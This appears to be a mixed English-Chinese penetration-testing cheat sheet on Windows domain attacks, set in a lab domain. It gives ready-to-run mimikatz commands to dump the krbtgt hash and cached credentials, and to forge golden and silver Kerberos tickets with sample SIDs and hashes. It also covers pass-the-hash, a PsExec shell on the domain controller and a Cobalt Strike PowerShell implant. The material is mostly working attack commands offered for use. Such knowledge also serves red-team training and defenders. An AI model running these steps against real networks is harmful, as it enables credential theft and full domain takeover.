Golden Ticket
When the attacker has obtained the domain controller's administrative authority
klist and executes klist on the domain member host, he can view the cached ticket
klist purge. Clear the ticket
during the domain penetration process. If the domain administrator's password has been changed, try to use the history of the krbtgt user Hash is used for ticket delivery attacks. Generally, no one will modify the password of the krbtgt user to
collect information.
域名 net time /domain ipconfig /all
伪造管理员用户名 net group "domain admins"
krbtgt账号的哈希值 mimikatz.exe "lsadump::dcsync /domain:NoOne.com /user:krbtgt" exit
域的SID值(去掉最后的500) wmic useraccount get name,sid
#导出krbtgt的ntlm hash
mimikatz.exe "lsadump::dcsync /domain:NoOne.com /user:krbtgt" exit
Use
#伪造黄金票据
mimikatz.exe "kerberos::golden /admin:Administrator /domain:NOONE.com /sid:S-1-5-21-2867916317-3317112163-957300651 /krbtgt:f965f8d06c2f73dd5d7015d0c2d10fa6 /ticket:Administrator.kirbi" exit
#pass the ticket票据传递,获取域管理员权限
mimikatz.exe "kerberos::ptt Administrator.kirbi" exit
Silver Ticket
Fake TGS, can only access the specified server
information collection
域名 net time /domain ipconfig /all
域的SID值(去掉最后的500) wmic useraccount get name,sid
目标机器的FQDN net time /domain 就是hostname+域名 /target:\\WIN-75NA0949GFB.NOONE.com
可利用的服务CIFS(磁盘共享的服务) /service:CIFS
要伪造的用户名 /user:Administrator
服务账号的ntlm hash(Primary Username : WIN-75NA0949GFB$带$的hash,不是admin的) /rc4:08d93ddf15a6309a46daaa7ec8565296
#生成了mimikatz.log文件(域控主机执行)
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit
/user: 要伪造的目标用户/计算机 Target Account/Computer to Impersonate
/ptt: Optional (Will Inject Ticket or you can do with Rubeus)
/service:cifs 服务参数为cifs
/domain 参数为域名
/sid 参数为域sid (whoami /user)
/target The FDQN 指定域内的机器 /target:WIN-75NA0949GFB.NOONE.com
/rc4 服务账号的ntml hash
/user 需要伪造的用户名 NTLM Hash of User Password/Computer Password
Use
#生成了mimikatz.log文件(域控主机执行)
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit
#伪造白银票据,伪造CIFS服务权限
mimikatz.exe "kerberos::golden /domain:NOONE.com /sid:S-1-5-21-2867916317-3317112163-957300651 /target:WIN-75NA0949GFB.NOONE.com /service:CIFS /rc4:08d93ddf15a6309a46daaa7ec8565296 /user:Administrator /ptt" exit
dir \\WIN-75NA0949GFB.NOONE.com\c$
pass the hash
拿到本地管理员权限,如果域控的密码和web本地管理员的密码相同可用pth
#提升权限且获取hash
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
#hash传递
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:NoOne.com /ntlm:c217b77d43348c0fa3c1f83f29747d5a"
#列出域控主机C盘
dir \\WIN-75NA0949GFB.NOONE.com\c$
只看域控的C盘很没意思吧,那就来点有意思的
在受控的域成员主机上 上传PsExec.exe,进到所在目录(https://github.com/vijayphilip/PsExecRemoteWinEC2)
psexec.exe \\WIN-75NA0949GFB.NOONE.com cmd.exe 即可反弹域控的shell
然后cs生成powershell马,使域控主机上线
Note: ERROR kuhl_m_kerberos_ptt_data; LsaCallAuthenticationPackage KerbSubmitTicketMessage: c000000d
After a series of experiments of mine, if the domain member host is windows xp or windows server 2003, it is impossible to forge a ticket normally